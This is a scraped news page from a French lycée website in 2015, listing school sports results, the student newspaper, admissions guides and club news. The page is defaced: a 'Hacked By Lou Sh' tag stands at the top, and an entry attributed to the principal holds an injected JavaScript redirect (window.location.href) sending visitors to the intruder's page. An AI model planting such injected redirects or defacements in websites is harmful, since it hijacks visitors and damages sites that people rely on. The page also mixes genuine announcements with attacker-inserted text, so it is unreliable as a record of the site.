Hacked By Lou Sh
lire l'&eacutedito lire l'&eacutedito lire l'&eacutedito

Présentation de l’EPS au Lycée Nord Bassin

lundi 30 mars 2015 par L’équipe d’EPS
Pour vous permettre d’être incollable sur l’EPS au Lycée Nord Bassin, l’équipe des enseignants d’EPS vous présente ce document synthétisant les principales informations. Bonne lecture...

De très bons résultats pour les sportifs du lycée

jeudi 19 mars 2015 par L’équipe d’EPS
Ce mercredi 18 mars, deux finales départementales ont vu nos élèves se révéler. La première rencontre, au Lycée des graves à Gradignan, proposait les finales individuelles féminines de badminton. Les vingt meilleures joueuses se sont affrontées dans des matchs de hautes volées et les résultats sont de (...)

Un mercredi ensoleillé pour les équipes du lycée

jeudi 12 mars 2015 par L’équipe d’EPS
Ce mercredi 11 mars a souri pour les élèves du Lycée Nord Bassin. Deux sites dans la banlieue bordelaise accueillaient les finales départementales de Volley-ball et de Course d’Orientation. L’équipe féminine de Volley-ball a été en pleine réussite et devient Championne Départementale devant les grands (...)

lundi 9 mars 2015 par Le Proviseur
window.location.href = "http://lyceenordbassin.com/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

Le journal du Lycée Nord Bassin est en ligne !

vendredi 6 février 2015 par webmestre
Ça y est : le n°1 du Pigeon 2 Poche, Le canard qui pige un max, est sorti ! Le journal du Lycée Nord Bassin est consultable en ligne. Pigeon 2 poche

Guide des admissions post-bac 2015

mercredi 21 janvier 2015 par webmestre
Cliquez sur les documents ci-dessous pour consulter les différentes filières post-baccalauréat selon l’orientation suivie en Terminale. Après un BAC L et ES Après un BAC S Après un BAC STMG

Bourse Nationale de Lycée 2015-2016

lundi 19 janvier 2015 par webmestre

Salon Aquitec 2015

vendredi 16 janvier 2015 par webmestre
Aquitec est le premier salon régional de l’Orientation, des Métiers, de l’Emploi et de la Formation. Il met en relation les professionnels, les entreprises, les associations, les institutionnels et les établissements scolaires, universitaires de formation initiale et/ou continue avec les 16-25 ans (...)

Le Club des Photographes a le plaisir de vous présenter son tout nouveau blog !

lundi 12 janvier 2015 par webmestre
Actif depuis le mois d’octobre, le groupe a réalisé le photoreportage de la Journée Mondiale de lutte contre le sida, les portraits de José Antonio et de Fleuriane illustrant une interview du Club des Journalistes, des séances de light painting endiablées, une exploration de l’univers étrange qui (...)

Meilleurs voeux 2015

lundi 5 janvier 2015 par Le Proviseur

« mai 2015 »
lun. mar. mer. jeu. ven. sam. dim.
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31